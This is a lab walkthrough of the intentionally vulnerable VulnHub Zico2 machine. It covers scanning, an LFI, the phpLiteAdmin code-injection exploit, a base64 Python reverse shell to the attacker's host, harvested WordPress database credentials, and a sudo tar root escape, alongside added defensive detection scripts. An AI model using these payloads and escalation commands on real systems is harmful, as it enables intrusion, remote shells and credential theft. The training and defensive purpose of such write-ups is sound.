About the Machine
Description:
Doesn't work with VMware. Virtualbox only.
Vulnhub Page:
https://www.vulnhub.com/entry/zico2-1,210/
Download Page: https://download.vulnhub.com/zico/zico2.ova
Walkthrough
Let's find the machine's IP address.
┌──(root💀kali)-[/home/kali]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fea6:1f86 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:a6:1f:86 txqueuelen 1000 (Ethernet)
RX packets 11 bytes 4438 (4.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11 bytes 1142 (1.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root💀kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:a6:1f:86, IPv4: 10.0.2.15
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1 52:54:00:12:35:00 QEMU
10.0.2.2 52:54:00:12:35:00 QEMU
10.0.2.3 08:00:27:1f:e3:ff PCS Systemtechnik GmbH
10.0.2.6 08:00:27:81:10:28 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.765 seconds (92.59 hosts/sec). 4 responded
Let's continue with an nmap scan.
┌──(root💀kali)-[/home/kali]
└─# nmap -p- -A -T4 10.0.2.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 18:45 EDT
Nmap scan report for 10.0.2.6
Host is up (0.00085s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 32890/udp6 status
| 100024 1 44197/tcp status
| 100024 1 51071/udp status
|_ 100024 1 56680/tcp6 status
44197/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:81:10:28 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.0.2.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.99 seconds
An open HTTP port is always a good sign. Let's continue with nikto and dirb.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# dirb http://10.0.2.6/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 16 19:26:57 2021
URL_BASE: http://10.0.2.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.6/ ----
+ http://10.0.2.6/cgi-bin/ (CODE:403|SIZE:284)
==> DIRECTORY: http://10.0.2.6/css/
==> DIRECTORY: http://10.0.2.6/dbadmin/
==> DIRECTORY: http://10.0.2.6/img/
+ http://10.0.2.6/index (CODE:200|SIZE:7970)
+ http://10.0.2.6/index.html (CODE:200|SIZE:7970)
==> DIRECTORY: http://10.0.2.6/js/
+ http://10.0.2.6/LICENSE (CODE:200|SIZE:1094)
+ http://10.0.2.6/package (CODE:200|SIZE:789)
+ http://10.0.2.6/server-status (CODE:403|SIZE:289)
+ http://10.0.2.6/tools (CODE:200|SIZE:8355)
==> DIRECTORY: http://10.0.2.6/vendor/
+ http://10.0.2.6/view (CODE:200|SIZE:0)
The http://10.0.2.6/dbadmin/ address stands out, so I started examining it in the browser.
The http://10.0.2.6/view.php?page= address caught my attention and I thought it might be an LFI. So I used my GitHub project, which I am still writing but only work on while solving machines.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# python3 lfi-project.py 130 ⨯
[*] Proje çalışırken bir proxy sunucusu kullanılması tavsiye edilmektedir. Burp gibi bir araç kullanabilirsiniz. Default ayarlamaları değiştirmek için kodları okuyunuz. Eğer ayarlamalarını hazır değilse 'q' ile çıkış yapabilirsiniz.
[*] Hedef URL'i giriniz:
http://10.0.2.6/view.php?page=
Lütfen LFI türünü seçiniz:
1- Default
2- Filter
1
[*] Terminalde kayan anlamsız yazılar ister misiniz?(e/h)h
[*] Lütfen kaç kere ../ uygulanmasını istediğini belirtiniz. (Örn: 8)4
If you look at the project's source code, it uses a proxy. Looking at the output in Burp, we can see that there is an LFI. However, I could not get RCE from here. I thought I might make use of it later and noted it down.
While continuing to examine the site, I logged in to http://10.0.2.6/dbadmin/test_db.php? with the password admin. While searching for an exploit for the project, I found the following results.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# searchsploit phpLiteAdmin
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# cd ..
┌──(root💀kali)-[/home/kali/Desktop]
└─# locate php/webapps/24044.txt
/usr/share/exploitdb/exploits/php/webapps/24044.txt
┌──(root💀kali)-[/home/kali/Desktop]
└─# cat /usr/share/exploitdb/exploits/php/webapps/24044.txt
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux
Description:
phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',
An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.
Proof of Concept:
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
Done!
Proof: http://goo.gl/ZqPVL
I followed the steps here in order. When I first used the payload <?php system("which nc; cat /etc/passwd; which python;"); ?>, at http://10.0.2.6/view.php?page=../../../../usr/databases/hack.php I got
SQLite format 3@ -â! €€~_tabletesttestCREATE TABLE 'test' ('cmd' TEXT default '/bin/nc root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ntp:x:103:108::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vboxadd:x:999:1::/var/run/vboxadd:/bin/false statd:x:105:65534::/var/lib/nfs:/bin/false mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false zico:x:1000:1000:,,,:/home/zico:/bin/bash /usr/bin/python ")')
as the result. Great, we can run PHP code and Linux commands. Also, as can be seen, /usr/bin/python is present, so Python is installed on the system. So I decided to set up a Python reverse shell via base64. Using the document I found in searchsploit, this time I used the payload below.
<?php system(base64_decode("cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4yLjE1IiwxODIyKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn")); ?>
In short, the code above decodes to:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Meanwhile, of course, I started a listener on port 1822 and was able to get a reverse shell.
┌──(root💀kali)-[/home/kali/Desktop]
└─# nc -lvp 1822
listening on [any] 1822 ...
10.0.2.6: inverse host lookup failed: Unknown host
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.6] 58813
www-data@zico:/var/www$ ls
ls
LICENSE css gulpfile.js index.html less tools.html view.php
README.md dbadmin img js package.json vendor
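As an added defender-side example (not code from this walkthrough or from phpLiteAdmin), the two checks that would have blocked or caught the step above: rejecting a database name that does not carry a SQLite extension or that contains path components, and scanning a directory for SQLite files that also contain a PHP open tag. The extension allowlist, the sample files and the temp-directory demo are assumptions constructed here.

```python
import os
import re
import tempfile
from typing import List, Optional

# Assumed allowlist of SQLite extensions; the vulnerable version accepted any name.
ALLOWED_DB_EXTENSIONS = {".db", ".db3", ".sqlite", ".sqlite3"}

def safe_db_filename(name: str) -> Optional[str]:
    """Return a safe filename for a new database, or None if the request is rejected."""
    base = os.path.basename(name)
    if base != name or not base or base.startswith("."):   # traversal, empty or hidden
        return None
    root, ext = os.path.splitext(base)
    if not re.fullmatch(r"[A-Za-z0-9_-]+", root):
        return None
    if ext == "":                                            # append an extension, as the tool does
        return base + ".sqlite"
    if ext.lower() not in ALLOWED_DB_EXTENSIONS:             # rejects hack.php and similar
        return None
    return base

SQLITE_MAGIC = b"SQLite format 3\x00"
PHP_TAG = re.compile(rb"<\?(?:php\b|=)")

def find_php_in_sqlite(directory: str) -> List[str]:
    """Detection: list SQLite files in a directory that also contain a PHP open tag."""
    hits = []
    for entry in os.scandir(directory):
        if not entry.is_file():
            continue
        with open(entry.path, "rb") as fh:
            data = fh.read()
        if data.startswith(SQLITE_MAGIC) and PHP_TAG.search(data):
            hits.append(entry.name)
    return sorted(hits)

def demo() -> List[str]:
    """Constructed samples: a clean database, a PHP-laced 'database' and a plain HTML file."""
    d = tempfile.mkdtemp()
    samples = {
        "shop.db": SQLITE_MAGIC + b"\x00" * 32 + b"CREATE TABLE items (name TEXT)",
        "hack.php": SQLITE_MAGIC + b"\x00" * 32 + b"CREATE TABLE test (cmd TEXT default '<?php phpinfo()?>')",
        "index.html": b"<html><?php echo 1; ?></html>",    # PHP tag, but not a SQLite file
    }
    for fname, content in samples.items():
        with open(os.path.join(d, fname), "wb") as fh:
            fh.write(content)
    return find_php_in_sqlite(d)
```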
After looking around inside, I found a WordPress config file and tried the credentials in it for SSH.
www-data@zico:/tmp$ cd /home
cd /home
www-data@zico:/home$ ls
ls
zico
www-data@zico:/home$ cd zico
cd zico
www-data@zico:/home/zico$ ls
ls
bootstrap.zip to_do.txt zico-history.tar.gz
joomla wordpress
startbootstrap-business-casual-gh-pages wordpress-4.8.zip
www-data@zico:/home/zico$ cat to_do*
cat to_do*
try list:
- joomla
- bootstrap (+phpliteadmin)
- wordpress
www-data@zico:/home/zico$ cd wordpress
cd wordpress
www-data@zico:/home/zico/wordpress$ ls
ls
index.php wp-blog-header.php wp-includes wp-settings.php
license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
wp-admin wp-cron.php wp-mail.php
www-data@zico:/home/zico/wordpress$ head wp-config.php -n 40
head wp-config.php -n 40
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
/** MySQL hostname */
define('DB_HOST', 'zico');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
www-data@zico:/home/zico/wordpress$
┌──(root💀kali)-[/home/kali/Desktop]
└─# ssh zico@10.0.2.6
The authenticity of host '10.0.2.6 (10.0.2.6)' can't be established.
ECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG/k2igw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.6' (ECDSA) to the list of known hosts.
zico@10.0.2.6's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
zico@zico:~$ whoami
zico
While looking around inside, I found the following.
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
So I started researching on the internet how I could become root with /bin/tar and found this address. In short, we can become root with the commands below.
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This only works for GNU tar.
tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
This only works for GNU tar. It can be useful when only a limited command argument injection is available.
TF=$(mktemp)
echo '/bin/sh 0<&1' > "$TF"
tar cf "$TF.tar" "$TF"
tar xf "$TF.tar" --to-command sh
rm "$TF"*
Let's try it!
zico@zico:~$ sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/bin/tar: Removing leading `/' from member names
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
#
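As an added example (not the author's or GTFOBins' code), a small Python audit script that flags sudo rules granting tar or zip, the two binaries in this machine's sudo -l output, and scans sudo's syslog lines for tar invocations carrying the escape options shown above. The sudo -l text and auth.log lines are samples constructed from this walkthrough; the binary list and option list are assumptions.

```python
import re
from typing import List, Tuple

# Binaries from this machine's sudo -l output that GTFOBins documents as shell escapes.
SHELL_ESCAPE_BINARIES = {"/bin/tar", "/usr/bin/zip"}

SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")

def risky_sudo_rules(sudo_l_output: str) -> List[Tuple[str, str, bool]]:
    """Parse `sudo -l` output; return (run-as user, binary, NOPASSWD?) for escapable binaries."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if m and m.group("cmd") in SHELL_ESCAPE_BINARIES:
            findings.append((m.group("runas"), m.group("cmd"), "NOPASSWD:" in m.group("tags")))
    return findings

# tar options that hand execution to another program (the GTFOBins variants shown above).
TAR_ESCAPE_OPTS = re.compile(r"--(?:checkpoint-action|to-command|use-compress-program)\b|\s-I\s")
# Standard sudo syslog line: "sudo:  user : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_LOG = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

def suspicious_sudo_commands(auth_log: str) -> List[Tuple[str, str]]:
    """Return (invoking user, command) for sudo'd tar runs that carry an escape option."""
    hits = []
    for line in auth_log.splitlines():
        m = SUDO_LOG.search(line)
        if m and m.group("cmd").startswith("/bin/tar") and TAR_ESCAPE_OPTS.search(m.group("cmd")):
            hits.append((m.group("user"), m.group("cmd")))
    return hits

# Constructed samples: the sudo -l rules from this walkthrough, plus two auth.log lines
# (the privilege-escalation command used above and a legitimate backup run).
SUDO_L_OUTPUT = """User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
"""
AUTH_LOG = """Jun 16 19:40:01 zico sudo:     zico : TTY=pts/0 ; PWD=/home/zico ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Jun 16 19:41:12 zico sudo:     zico : TTY=pts/0 ; PWD=/home/zico ; USER=root ; COMMAND=/bin/tar -czf /tmp/www.tgz /var/www
"""
```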